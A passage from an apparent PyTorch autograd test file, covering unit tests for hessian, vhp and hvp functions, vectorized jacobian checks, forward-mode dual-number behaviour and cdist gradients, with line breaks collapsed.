torch.randn(3) y = torch.randn(3) self._check_jacobian_vectorize_correctness(f, (x, y)) def test_jacobian_vectorize_correctness_different_dtype(self): def f(x, y): return (x * y).float(), (x * y).double() x = torch.randn(3) y = torch.randn(3) self._check_jacobian_vectorize_correctness(f, (x, y)) def _check_hessian_vectorize_correctness(self, f, inputs): expected = autogradF.hessian(f, inputs, vectorize=False) result = autogradF.hessian(f, inputs, vectorize=True) self.assertEqual(result, expected) def test_hessian_vectorize_correctness_simple(self): def f(x): return (3 * x ** 2).sum() x = torch.randn(2, 3, 5) self._check_hessian_vectorize_correctness(f, x) def test_hessian_vectorize_correctness_multi_input(self): def f(x, y, z): return ((x.relu() * x) @ y.sin() @ z).sum() x = torch.randn(2, 3) y = torch.randn(3, 5) z = torch.randn(5, 5) self._check_hessian_vectorize_correctness(f, (x, y, z)) def test_hessian_vectorize_correctness_unrelated_outputs(self): # output unrelated to one input def f(x, y): return (x ** 2).sum() x = torch.randn(2) y = torch.randn(3) self._check_hessian_vectorize_correctness(f, (x, y)) # output unrelated to all inputs def f(x, y): return torch.randn([]) x = torch.randn(2) y = torch.randn(3) self._check_hessian_vectorize_correctness(f, (x, y)) def _test_hessian_err_check(self, vectorize): def foo(a): return 3 * a.narrow(0, 0, 3).exp().sum() def bar(a): return 3 * a.narrow(0, 0, 3), "bar" def bar2(a): return 3 * a.narrow(0, 0, 3) def bar3(a): return 3 * a.narrow(0, 0, 3), 3 * a.narrow(0, 0, 3) inp = torch.rand(4) with self.assertRaisesRegex(TypeError, "The inputs given to hessian must be either a Tensor"): res = autogradF.hessian(foo, (inp, 2), vectorize=vectorize) with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to hessian must"): res = autogradF.hessian(bar, inp, vectorize=vectorize) err_msg_out = "The Tensor returned by the function given to hessian should contain a single element" with self.assertRaisesRegex(RuntimeError, err_msg_out): res = autogradF.hessian(bar2, inp, vectorize=vectorize) with self.assertRaisesRegex(RuntimeError, "The function given to hessian should return a single Tensor"): res = autogradF.hessian(bar3, inp, vectorize=vectorize) res = autogradF.hessian(foo, inp, vectorize=vectorize) self._assert_interleaved_struct(res, inp, inp) def foo(a, b): return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum() inp = (torch.rand(4), torch.rand(5)) res = autogradF.hessian(foo, inp, vectorize=vectorize) self._assert_interleaved_struct(res, inp, inp) def test_hessian_err_check(self): self._test_hessian_err_check(vectorize=False) def test_hessian_err_check_vectorize(self): self._test_hessian_err_check(vectorize=True) def test_hessian_err_check_strict(self): def foo(a): return a.detach().sum() def bar(a): # Make a non-leaf Tensor that requires_grad but that is not connected to the input return a.long().float().requires_grad_().clone().sum() def bar2(a): # A Linear function for which the jacobian is independent of the input return (3 * a).sum() inp = torch.rand(4) with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."): res = autogradF.hessian(foo, inp, strict=True) res = autogradF.hessian(foo, inp, strict=False) self._assert_interleaved_struct(res, inp, inp) self.assertEqual(res.abs().sum(), 0.) with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0"): res = autogradF.hessian(bar, inp, strict=True) res = autogradF.hessian(bar, inp, strict=False) self._assert_interleaved_struct(res, inp, inp) self.assertEqual(res.abs().sum(), 0.) with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"): res = autogradF.hessian(bar2, inp, strict=True) res = autogradF.hessian(bar2, inp, strict=False) self._assert_interleaved_struct(res, inp, inp) self.assertEqual(res.abs().sum(), 0.) def test_hessian_err_check_strict_vectorize(self): def foo(x): return (x ** 3).sum() inp = torch.rand(4) with self.assertRaisesRegex(RuntimeError, "not supported together"): res = autogradF.hessian(foo, inp, strict=True, vectorize=True) def test_hessian_no_grad(self): def pow_reducer(x): return x.pow(3).sum() inputs = torch.rand(2, 2) with torch.no_grad(): res = autogradF.hessian(pow_reducer, inputs) self.assertIsNone(res[0][0].grad_fn) self.assertIsNone(res[0][1].grad_fn) self.assertIsNone(res[1][0].grad_fn) self.assertIsNone(res[1][1].grad_fn) self.assertNotEqual(res, torch.zeros(2, 2, 2)) with torch.no_grad(): res = autogradF.hessian(pow_reducer, inputs, create_graph=True) self.assertIsNotNone(res[0][0].grad_fn) self.assertIsNotNone(res[0][1].grad_fn) self.assertIsNotNone(res[1][0].grad_fn) self.assertIsNotNone(res[1][1].grad_fn) self.assertNotEqual(res, torch.zeros(2, 2, 2)) def _test_hessian_output(self, vectorize): def pow_reducer(x): return x.pow(3).sum() inputs = torch.rand(2, 2) res = autogradF.hessian(pow_reducer, inputs, vectorize=vectorize) self._assert_interleaved_struct(res, inputs, inputs) self.assertIsNone(res.grad_fn) def add_pow_reducer(x, y): return (x + y).pow(3).sum() inputs = (torch.rand(2, 2), torch.rand(2, 2)) res = autogradF.hessian(add_pow_reducer, inputs, vectorize=vectorize) self._assert_interleaved_struct(res, inputs, inputs) self.assertIsNone(res[0][0].grad_fn) self.assertIsNone(res[0][1].grad_fn) self.assertIsNone(res[1][0].grad_fn) self.assertIsNone(res[1][1].grad_fn) def test_hessian_output(self): self._test_hessian_output(vectorize=False) def test_hessian_output_vectorize(self): self._test_hessian_output(vectorize=True) def _test_hessian_scalar(self, vectorize): def reducer(x): return x.sum() inputs = torch.rand(4, 4) res = autogradF.hessian(reducer, inputs, vectorize=vectorize) self._assert_interleaved_struct(res, inputs, inputs) inputs = torch.rand([]) res = autogradF.hessian(reducer, inputs, vectorize=vectorize) self._assert_same_struct(res, inputs) def bad_reducer(x): return x.sum().view(1, 1, 1) inputs = torch.rand(4, 4) res = autogradF.hessian(bad_reducer, inputs, vectorize=vectorize) self._assert_interleaved_struct(res, inputs, inputs) def test_hessian_scalar(self): return self._test_hessian_scalar(vectorize=False) def test_hessian_scalar_vectorize(self): return self._test_hessian_scalar(vectorize=True) def _test_hessian_create_graph(self, vectorize): def pow_reducer(x): return x.pow(3).sum() inputs = torch.rand(2, 2, dtype=torch.double, requires_grad=True) res = autogradF.hessian(pow_reducer, inputs, create_graph=True, vectorize=vectorize) self._assert_interleaved_struct(res, inputs, inputs) self.assertIsNotNone(res.grad_fn) gradcheck(lambda inp: autogradF.hessian(pow_reducer, inp, create_graph=True, vectorize=vectorize), inputs) gradgradcheck(lambda inp: autogradF.hessian(pow_reducer, inp, create_graph=True, vectorize=vectorize), inputs) def add_pow_reducer(x, y): return (x + y).pow(3).sum() inputs = (torch.rand(2, 2, dtype=torch.double, requires_grad=True), torch.rand(2, 2, dtype=torch.double, requires_grad=True)) res = autogradF.hessian(add_pow_reducer, inputs, create_graph=True, vectorize=vectorize) self._assert_interleaved_struct(res, inputs, inputs) self.assertIsNotNone(res[0][0].grad_fn) self.assertIsNotNone(res[0][1].grad_fn) self.assertIsNotNone(res[1][0].grad_fn) self.assertIsNotNone(res[1][1].grad_fn) def flatten(inp): return tuple(el_lvl2 for el_lvl1 in inp for el_lvl2 in el_lvl1) gradcheck(lambda *inp: flatten(autogradF.hessian(add_pow_reducer, inp, create_graph=True, vectorize=vectorize)), inputs) gradgradcheck(lambda *inp: flatten(autogradF.hessian(add_pow_reducer, inp, create_graph=True, vectorize=vectorize)), inputs) def foo(x, y): x = x.cos() val, hess = autogradF.hessian(add_pow_reducer, (x, y), create_graph=True, vectorize=vectorize) res = val[0].cos().sum() + val[1].cos().sum() + hess[0].cos().sum() res = res + hess[1].cos().sum() + x.cos().sum() + y.cos().sum() return res gradcheck(foo, inputs) gradgradcheck(foo, inputs) def test_hessian_create_graph(self): self._test_hessian_create_graph(vectorize=False) def test_hessian_create_graph_vectorize(self): self._test_hessian_create_graph(vectorize=True) def test_vhp_err_check(self): def foo(a): return 3 * a.narrow(0, 0, 3).exp().sum() def bar(a): return 3 * a.narrow(0, 0, 3), "bar" def bar2(a): return 3 * a.narrow(0, 0, 3) inp = torch.rand(4) v = torch.rand(4) with self.assertRaisesRegex(TypeError, "The inputs given to vhp must be either a Tensor"): res = autogradF.vhp(foo, (inp, 2), v) with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to vhp must"): res = autogradF.vhp(bar, inp, v) err_msg_out = "The Tensor returned by the function given to vhp should contain a single element" with self.assertRaisesRegex(RuntimeError, err_msg_out): res = autogradF.vhp(bar2, inp, v) with self.assertRaisesRegex(RuntimeError, "v has invalid size:"): res = autogradF.vhp(foo, inp, torch.rand(5)) with self.assertRaisesRegex(TypeError, "The v given to vhp must be either a Tensor or a tuple of Tensors"): res = autogradF.vhp(foo, inp, (v, 2)) res = autogradF.vhp(foo, inp, v) self._assert_same_struct(res[1], inp) def foo(a, b): return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum() inp = (torch.rand(4), torch.rand(5)) v = (torch.rand(4), torch.rand(5)) res = autogradF.vhp(foo, inp, v) self._assert_same_struct(res[1], inp) def test_vhp_err_check_strict(self): def foo(a): return a.detach().sum() def bar(a): # Make a non-leaf Tensor that requires_grad but that is not connected to the input return a.long().float().requires_grad_().clone().sum() def bar2(a): # A Linear function for which the jacobian is independent of the input return (3 * a).sum() inp = torch.rand(4) v = torch.rand(4) with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."): res = autogradF.vhp(foo, inp, v, strict=True) res = autogradF.vhp(foo, inp, v, strict=False) self._assert_same_struct(res[1], inp) self.assertEqual(res[1].abs().sum(), 0.) with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"): res = autogradF.vhp(bar, inp, v, strict=True) res = autogradF.vhp(bar, inp, v, strict=False) self._assert_same_struct(res[1], inp) self.assertEqual(res[1].abs().sum(), 0.) with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"): res = autogradF.vhp(bar2, inp, v, strict=True) res = autogradF.vhp(bar2, inp, v, strict=False) self._assert_same_struct(res[1], inp) self.assertEqual(res[1].abs().sum(), 0.) def test_vhp_no_grad(self): def reducer(x): return x.exp().sum() inputs = torch.rand(4, 4) v = torch.ones(4, 4) with torch.no_grad(): res = autogradF.vhp(reducer, inputs, v) self.assertIsNone(res[0].grad_fn) self.assertIsNone(res[1].grad_fn) self.assertNotEqual(res[1], torch.zeros(4, 4)) with torch.no_grad(): res = autogradF.vhp(reducer, inputs, v, create_graph=True) self.assertIsNotNone(res[0].grad_fn) self.assertIsNotNone(res[1].grad_fn) self.assertNotEqual(res[1], torch.zeros(4, 4)) def test_vhp_output(self): def foo(a): return 3 * a.narrow(0, 0, 3).exp().sum() inputs = torch.rand(4, 4) v = torch.ones(4, 4) res = autogradF.vhp(foo, inputs, v) self._assert_same_struct(res[1], inputs) self.assertIsNone(res[0].grad_fn) self.assertIsNone(res[1].grad_fn) def bar(a, b): return (a + 3 * b.narrow(0, 0, 3)).exp().sum() inputs = (torch.rand(3), torch.rand(4)) v = (torch.ones(3), torch.ones(4)) out, vhp_val = autogradF.vhp(bar, inputs, v) self._assert_same_struct(vhp_val, inputs) self.assertIsNone(out.grad_fn) self.assertIsNone(vhp_val[0].grad_fn) self.assertIsNone(vhp_val[1].grad_fn) def test_vhp_scalar(self): def reducer(x): return x.sum() inputs = torch.rand(4, 4) v = torch.ones(4, 4) res = autogradF.vhp(reducer, inputs, v) self._assert_same_struct(res[1], inputs) inputs = torch.rand([]) v = torch.rand([]) res = autogradF.vhp(reducer, inputs, v) self._assert_same_struct(res[1], inputs) res = autogradF.vhp(reducer, inputs) self._assert_same_struct(res[1], inputs) def bad_reducer(x): return x.sum().view(1, 1, 1) inputs = torch.rand(4, 4) v = torch.rand(4, 4) res = autogradF.vhp(bad_reducer, inputs, v) self._assert_same_struct(res[1], inputs) def test_vhp_create_graph(self): def foo(a): return 3 * a.narrow(0, 0, 3).exp().sum() inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True) v = torch.ones(4, 4, dtype=torch.double, requires_grad=True) res = autogradF.vhp(foo, inputs, v, create_graph=True) self._assert_same_struct(res[1], inputs) self.assertIsNotNone(res[0].grad_fn) self.assertIsNotNone(res[1].grad_fn) gradcheck(lambda inp, v: autogradF.vhp(foo, inp, v, create_graph=True), (inputs, v)) gradgradcheck(lambda inp, v: autogradF.vhp(foo, inp, v, create_graph=True), (inputs, v)) def bar(a, b): return (a + 3 * b.narrow(0, 0, 3)).exp().sum() inputs = (torch.rand(3, dtype=torch.double, requires_grad=True), torch.rand(4, dtype=torch.double, requires_grad=True)) v = (torch.ones(3, dtype=torch.double, requires_grad=True), torch.ones(4, dtype=torch.double, requires_grad=True)) out, vhp_val = autogradF.vhp(bar, inputs, v, create_graph=True) self._assert_same_struct(vhp_val, inputs) self.assertIsNotNone(out.grad_fn) self.assertIsNotNone(vhp_val[0].grad_fn) self.assertIsNotNone(vhp_val[1].grad_fn) gradcheck(lambda *args: autogradF.vhp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v) gradgradcheck(lambda *args: autogradF.vhp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v) def foo(*args): x, y = args[:2] v = args[2:] x = x.cos() val, grad = autogradF.vhp(bar, (x, y), v, create_graph=True) return val.cos() + grad[0].cos().sum() + grad[1].cos() + x.cos().sum() + y.cos() gradcheck(foo, inputs + v) gradgradcheck(foo, inputs + v) def test_hvp_err_check(self): def foo(a): return 3 * a.narrow(0, 0, 3).exp().sum() def bar(a): return 3 * a.narrow(0, 0, 3), "bar" def bar2(a): return 3 * a.narrow(0, 0, 3) inp = torch.rand(4) v = torch.rand(4) res = autogradF.hvp(foo, inp, v) with self.assertRaisesRegex(TypeError, "The inputs given to hvp must be either a Tensor"): res = autogradF.hvp(foo, (inp, 2), v) with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to hvp must"): res = autogradF.hvp(bar, inp, v) err_msg_out = "The Tensor returned by the function given to hvp should contain a single element" with self.assertRaisesRegex(RuntimeError, err_msg_out): res = autogradF.hvp(bar2, inp, v) with self.assertRaisesRegex(RuntimeError, "v has invalid size:"): res = autogradF.hvp(foo, inp, torch.rand(5)) with self.assertRaisesRegex(TypeError, "The v given to hvp must be either a Tensor or a tuple of Tensors"): res = autogradF.hvp(foo, inp, (v, 2)) res = autogradF.hvp(foo, inp, v) self._assert_same_struct(res[1], inp) def foo(a, b): return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum() inp = (torch.rand(4), torch.rand(5)) v = (torch.rand(4), torch.rand(5)) res = autogradF.hvp(foo, inp, v) self._assert_same_struct(res[1], inp) def test_hvp_err_check_strict(self): def foo(a): return a.detach().sum() def bar(a): # Make a non-leaf Tensor that requires_grad but that is not connected to the input return a.long().float().requires_grad_().clone().sum() def bar2(a): # A Linear function for which the jacobian is independent of the input return (3 * a).sum() inp = torch.rand(4) v = torch.rand(4) with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."): res = autogradF.hvp(foo, inp, v, strict=True) res = autogradF.hvp(foo, inp, v, strict=False) self._assert_same_struct(res[1], inp) self.assertEqual(res[1].abs().sum(), 0.) with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"): res = autogradF.hvp(bar, inp, v, strict=True) res = autogradF.hvp(bar, inp, v, strict=False) self._assert_same_struct(res[1], inp) self.assertEqual(res[1].abs().sum(), 0.) with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"): res = autogradF.hvp(bar2, inp, v, strict=True) res = autogradF.hvp(bar2, inp, v, strict=False) self._assert_same_struct(res[1], inp) self.assertEqual(res[1].abs().sum(), 0.) def test_hvp_no_grad(self): def reducer(x): return x.exp().sum() inputs = torch.rand(4, 4) v = torch.ones(4, 4) with torch.no_grad(): res = autogradF.hvp(reducer, inputs, v) self.assertIsNone(res[0].grad_fn) self.assertIsNone(res[1].grad_fn) self.assertNotEqual(res[1], torch.zeros(4, 4)) with torch.no_grad(): res = autogradF.hvp(reducer, inputs, v, create_graph=True) self.assertIsNotNone(res[0].grad_fn) self.assertIsNotNone(res[1].grad_fn) self.assertNotEqual(res[1], torch.zeros(4, 4)) def test_hvp_output(self): def foo(a): return 3 * a.narrow(0, 0, 3).exp().sum() inputs = torch.rand(4, 4) v = torch.ones(4, 4) res = autogradF.hvp(foo, inputs, v) self._assert_same_struct(res[1], inputs) self.assertIsNone(res[0].grad_fn) self.assertIsNone(res[1].grad_fn) def bar(a, b): return (a + 3 * b.narrow(0, 0, 3)).exp().sum() inputs = (torch.rand(3), torch.rand(4)) v = (torch.ones(3), torch.ones(4)) out, hvp_val = autogradF.hvp(bar, inputs, v) self._assert_same_struct(hvp_val, inputs) self.assertIsNone(out.grad_fn) self.assertIsNone(hvp_val[0].grad_fn) self.assertIsNone(hvp_val[1].grad_fn) def test_hvp_scalar(self): def reducer(x): return x.exp().sum() inputs = torch.rand(4, 4) v = torch.ones(4, 4) res = autogradF.hvp(reducer, inputs, v) self._assert_same_struct(res[1], inputs) inputs = torch.rand([]) v = torch.rand([]) res = autogradF.hvp(reducer, inputs, v) self._assert_same_struct(res[1], inputs) res = autogradF.hvp(reducer, inputs) self._assert_same_struct(res[1], inputs) def bad_reducer(x): return x.exp().sum().view(1, 1, 1) inputs = torch.rand(4, 4) v = torch.rand(4, 4) res = autogradF.hvp(bad_reducer, inputs, v) self._assert_same_struct(res[1], inputs) def test_hvp_create_graph(self): def foo(a): return 3 * a.narrow(0, 0, 3).exp().sum() inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True) v = torch.ones(4, 4, dtype=torch.double, requires_grad=True) res = autogradF.hvp(foo, inputs, v, create_graph=True) self._assert_same_struct(res[1], inputs) self.assertIsNotNone(res[0].grad_fn) self.assertIsNotNone(res[1].grad_fn) gradcheck(lambda inp, v: autogradF.hvp(foo, inp, v, create_graph=True), (inputs, v)) gradgradcheck(lambda inp, v: autogradF.hvp(foo, inp, v, create_graph=True), (inputs, v)) def bar(a, b): return (a + 3 * b.narrow(0, 0, 3)).exp().sum() inputs = (torch.rand(3, dtype=torch.double, requires_grad=True), torch.rand(4, dtype=torch.double, requires_grad=True)) v = (torch.ones(3, dtype=torch.double, requires_grad=True), torch.ones(4, dtype=torch.double, requires_grad=True)) out, hvp_val = autogradF.hvp(bar, inputs, v, create_graph=True) self._assert_same_struct(hvp_val, inputs) self.assertIsNotNone(out.grad_fn) self.assertIsNotNone(hvp_val[0].grad_fn) self.assertIsNotNone(hvp_val[1].grad_fn) gradcheck(lambda *args: autogradF.hvp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v) gradgradcheck(lambda *args: autogradF.hvp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v) def foo(*args): x, y = args[:2] v = args[2:] x = x.cos() val, grad = autogradF.hvp(bar, (x, y), v, create_graph=True) return val.cos() + grad[0].cos().sum() + grad[1].cos() + x.cos().sum() + y.cos() gradcheck(foo, inputs + v) gradgradcheck(foo, inputs + v) def test_jacobian_match_vjp_jvp(self): def foo(x): return x ** 3 + x.sum() inputs = torch.rand(4) v = torch.rand(4) jac = autogradF.jacobian(foo, inputs) jvp = autogradF.jvp(foo, inputs, v)[1] vjp = autogradF.vjp(foo, inputs, v)[1] self.assertEqual(jvp, torch.mm(jac, v.unsqueeze(1)).squeeze(1)) self.assertEqual(vjp, torch.mm(v.unsqueeze(0), jac).squeeze(0)) def test_hessian_match_vhp_hvp(self): def foo(a): return 3 * a.narrow(0, 0, 3).exp().sum() inputs = torch.rand(4) v = torch.rand(4) hes = autogradF.hessian(foo, inputs) hvp = autogradF.hvp(foo, inputs, v)[1] vhp = autogradF.vhp(foo, inputs, v)[1] self.assertEqual(hvp, torch.mm(hes, v.unsqueeze(1)).squeeze(1)) self.assertEqual(vhp, torch.mm(v.unsqueeze(0), hes).squeeze(0)) class TestAutogradForwardMode(TestCase): def tearDown(self): # Ensure that a failing test won't make others fail while fwAD._current_level >= 0: fwAD.exit_dual_level() super().tearDown() def test_forward_level_cleanup(self): def get_tensor_and_weak_ref(): # Create a new Tensor and weak reference t = torch.rand(2, requires_grad=True) return t, torch._C._WeakTensorRef(t) # Sanity check that the helper function works as expected t, t_ref = get_tensor_and_weak_ref() self.assertFalse(t_ref.expired()) del t self.assertTrue(t_ref.expired()) # Main test code foo = torch.rand(2) with fwAD.dual_level(): tangent, tangent_ref = get_tensor_and_weak_ref() self.assertFalse(tangent_ref.expired()) dual = fwAD.make_dual(foo, tangent) self.assertFalse(tangent_ref.expired()) # Make sure that the tangent we provided has been re-used as is self.assertTrue(fwAD.unpack_dual(dual)[1] is tangent) # Make sure that dual is keeping the tangent alive del tangent self.assertFalse(tangent_ref.expired()) # Make sure that the dual level does not keep the c++ # version of the tangent alive del dual self.assertTrue(tangent_ref.expired()) def test_size_check(self): foo = torch.rand(2) tangent = torch.rand(3) with fwAD.dual_level(): with self.assertRaisesRegex(RuntimeError, "Trying to set a forward gradient that has a different size"): dual = fwAD.make_dual(foo, tangent) dual = fwAD.make_dual(foo, tangent[1:]) # The following test functions want to ensure all the following behaviors: # - Ensure that default level system in the python binding works # - Ensure that only level 0 exists and nesting is properly disabled # - Ensure that printing works fine # - Ensure that basic packing/unpacking works # - Ensure that advanced packing/unpacking works # - For memory / version counter share # - For backward AD (regular ops) # - Ensure that view + inplace for both modes work fine # - Ensure we do proper cleanup on exit of a level def test_default_level(self): foo = torch.rand(2) bar = torch.rand(2) with fwAD.dual_level(): baz = fwAD.make_dual(foo, bar) baz_primal, baz_tangent = fwAD.unpack_dual(baz) self.assertEqual(baz_primal, foo) # We don't actually need to enforce that these two are the exact same python # object, feel free to relax in the future self.assertIs(baz_tangent, bar) baz_primal, baz_tangent = fwAD.unpack_dual(baz) self.assertEqual(baz_primal, foo) self.assertEqual(baz_tangent, None) def test_nested_level(self): with fwAD.dual_level() as level: # For now only level 0 exists self.assertEqual(level, 0) with fwAD.dual_level(): with self.assertRaisesRegex(RuntimeError, "Nested forward mode AD is not supported at the moment"): nest_level = fwAD.enter_dual_level() def test_print(self): with fwAD.dual_level() as level: a = torch.rand(3) self.assertFalse("tangent=" in str(a)) b = fwAD.make_dual(a, torch.rand(3)) self.assertFalse("tangent=" in str(a)) self.assertTrue("tangent=" in str(b)) b_primal, b_tangent = fwAD.unpack_dual(b) self.assertFalse("tangent=" in str(b_primal)) self.assertFalse("tangent=" in str(b_tangent)) def test_basic_packing_unpacking(self): foo = torch.rand(2) bar = torch.rand(2) with fwAD.dual_level(): baz = fwAD.make_dual(foo, bar) baz_primal, baz_tangent = fwAD.unpack_dual(baz) self.assertEqual(baz_primal, foo) self.assertIs(baz_tangent, bar) # Check that packing/unpacking did not change the input foo_primal, foo_tangent = fwAD.unpack_dual(foo) self.assertEqual(foo_primal, foo) self.assertIsNone(foo_tangent) def test_advanced_packing_unpacking(self): foo = torch.rand(2) bar = torch.ones(2) # Memory and version counter check with fwAD.dual_level(): dual = fwAD.make_dual(foo, bar) # Ensure that they are sharing memory and version counter self.assertEqual(dual.storage().data_ptr(), foo.storage().data_ptr()) # Ensure we properly share the version counter self.assertEqual(foo._version, dual._version) foo.add_(1) self.assertEqual(foo._version, dual._version) # Unpacking should only create aliases as well dual_primal, dual_tangent = fwAD.unpack_dual(dual) self.assertEqual(dual_primal.storage().data_ptr(), foo.storage().data_ptr()) self.assertEqual(dual_tangent.storage().data_ptr(), bar.storage().data_ptr()) # And the tangent is actually re-used as-is so it is still the same Tensor self.assertIs(dual_tangent, bar) # Ensure we properly share the version counter self.assertEqual(foo._version, dual_primal._version) foo.add_(1) self.assertEqual(foo._version, dual_primal._version) self.assertEqual(bar._version, dual_tangent._version) bar.add_(1) self.assertEqual(bar._version, dual_tangent._version) # backward mode check with fwAD.dual_level(): foo.requires_grad_() bar.requires_grad_() # Check that backward gradients properly propagates through packing/unpacking dual = fwAD.make_dual(foo, bar) p, t = fwAD.unpack_dual(dual) gfoo, gbar = torch.autograd.grad(p.sum(), (foo, bar), retain_graph=True, allow_unused=True) self.assertEqual(gfoo, torch.ones_like(foo)) self.assertIsNone(gbar) gfoo, gbar = torch.autograd.grad(t.sum(), (foo, bar), retain_graph=True, allow_unused=True) self.assertIsNone(gfoo) self.assertEqual(gbar, torch.ones_like(bar)) # Check that forward gradients are impacted by detach() detached_dual = dual.detach() out = detached_dual * 2 p, t = fwAD.unpack_dual(out) self.assertFalse(p.requires_grad) self.assertEqual(p, foo * 2) self.assertIsNone(t) # Check that forward gradients are not impacted by no_grad with torch.no_grad(): out = dual * 3 p, t = fwAD.unpack_dual(out) self.assertFalse(p.requires_grad) self.assertFalse(t.requires_grad) self.assertEqual(p, foo * 3) self.assertEqual(t, bar * 3) # Check that forward gradients are not impacted by inplace detach dual = dual.clone() dual.detach_() out = dual * 2 p, t = fwAD.unpack_dual(out) self.assertFalse(p.requires_grad) self.assertEqual(p, foo * 2) self.assertIsNone(t) def test_view_inplace_non_differentiable_views(self): original_foo = torch.rand(2, dtype=torch.double) original_bar = torch.ones(2, dtype=torch.double) # Do clones to be able to compare the values updated inplace # with the original content of these Tensors foo = original_foo.clone() bar = original_bar.clone() with fwAD.dual_level(): # Note that in this test, we use "update" to mean computing the right tangent for the dual # All the inplace operations here are expected to update the primal value of the Tensors but # not always their tangents. # Also all mentions of "non differentiable view" here means non forward differentiable view # unless specified otherwise. # See note [Forward Grad View/inplace] for more details on how these views work. # Check that inplace ops do not update non-differentiable views # Non differentiable view dual = fwAD.make_dual(foo, bar) dual *= 2 # Check that non differentiable view's tangent was not updated self.assertIsNone(fwAD.unpack_dual(foo)[1]) # Check that the computed result is correct self.assertEqual(bar, original_bar * 2) self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 2) self.assertEqual(foo, original_foo * 2) self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 2) # Other non differentiable view dual_primal, dual_tangent = fwAD.unpack_dual(dual) self.assertIsNone(fwAD.unpack_dual(dual_primal)[1]) self.assertIsNone(fwAD.unpack_dual(dual_tangent)[1]) dual_primal *= 2 # Ensure dual's tangent did not change self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 4) self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 2) dual_tangent *= 2 # Ensure dual's primal did not change self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 4) self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 4) def test_view_inplace_differentiable_views(self): original_foo = torch.rand(2) original_bar = torch.ones(2) # Do clones to be able to compare the values updated inplace # with the original content of these Tensors foo = original_foo.clone() bar = original_bar.clone() with fwAD.dual_level(): # Check that inplace ops do update differentiable view but stop at non differentiable ones # A non differentiable view dual = fwAD.make_dual(foo, bar) # A differentiable view view = dual.narrow(0, 0, 1) view *= 2 # Check that non differentiable view was not updated self.assertIsNone(fwAD.unpack_dual(foo)[1]) # Check that differentiable view was updated self.assertEqual(fwAD.unpack_dual(dual)[1], torch.tensor([2., 1.])) self.assertEqual(fwAD.unpack_dual(view)[1], torch.tensor([2.])) # Check that we track differentiable view even for Tensors that are not dual baz = torch.rand(2) baz += dual self.assertEqual(fwAD.unpack_dual(baz)[1], fwAD.unpack_dual(dual)[1]) # Updates on view should as well baz = torch.rand(2) baz[0] = dual[0] self.assertEqual(fwAD.unpack_dual(baz)[1][0], fwAD.unpack_dual(dual)[1][0]) # Unused values get a gradient of 0 self.assertEqual(fwAD.unpack_dual(baz)[1][1], 0.) # Check that forward non-differentiable views do prevent gradient update baz = torch.rand(2) view = baz.detach() view += dual self.assertIsNone(fwAD.unpack_dual(baz)[1]) def test_grad_cleanup(self): foo = torch.rand(2) bar = torch.rand(2) baz = torch.rand(2) with fwAD.dual_level(): dual = fwAD.make_dual(foo, bar) self.assertIsNone(fwAD.unpack_dual(foo)[1]) self.assertIs(fwAD.unpack_dual(dual)[1], bar) self.assertIsNone(fwAD.unpack_dual(dual)[1]) with fwAD.dual_level(): self.assertIsNone(fwAD.unpack_dual(foo)[1]) new_dual = fwAD.make_dual(foo, baz) dual_primal, dual_tangent = fwAD.unpack_dual(dual) new_dual_primal, new_dual_tangent = fwAD.unpack_dual(new_dual) self.assertEqual(dual_primal, new_dual_primal) self.assertIsNone(dual_tangent) self.assertEqual(new_dual_tangent, baz) def test_detach_view_tracking(self): # Default detach is both forward and backward non-differentiable foo = torch.rand(2) foo_weak = torch._C._WeakTensorRef(foo) out = foo.detach() del foo self.assertTrue(foo_weak.expired()) # Generic device type autograd tests. class TestAutogradDeviceType(TestCase): def test_min_max_median_backprops_to_all_values(self, device): for f in [torch.min, torch.max, torch.median, torch.nanmedian]: x1 = torch.tensor([1., 0., 1., 0., 1., 0.], device=device, requires_grad=True) x2 = torch.tensor([float('nan'), float('nan'), float('nan')], requires_grad=True) for x in [x1, x2]: y = f(x) y.backward() self.assertEqual(x.grad.sum(), 1.) self.assertEqual((x.grad == 1 / 3).sum(), 3) def test_cdist(self, device): def _test_euclidean_large_cdist(sizex, sizey=None): if sizey is None: sizey = sizex x = torch.randn(sizex, device=device, dtype=torch.float) y = torch.randn(sizey, device=device, dtype=torch.float) eps = 1e-6 # to avoid extremum x = x - (((x - y) < eps).float() * 2 * eps) x.requires_grad = True y.requires_grad = True dist = torch.cdist(x, y, p=2) # Do a backward pass to check that it is valid for large # matrices loss = dist.sum() loss.backward() _test_euclidean_large_cdist((2000, 5)) # Ensure that cdist backward with p<1 does not produce NaNs def test_cdist_grad_p_lt_1_no_nan(self, device): for p in [0.99, 0.7, 0.5, 0.1, 0.01]: x = torch.randn(1, 2, device=device) y = x.clone().detach() + torch.tensor([[1., 0.]], device=device) x.requires_grad = True y.requires_grad = True result = torch.cdist(x, y, p=p) result.backward(torch.ones_like(result)) self.assertFalse(torch.isnan(x.grad).any()) self.assertFalse(torch.isnan(y.grad).any()) def test_cdist_same_inputs(self, device): # Test to detect issues in cdist gradient calculation 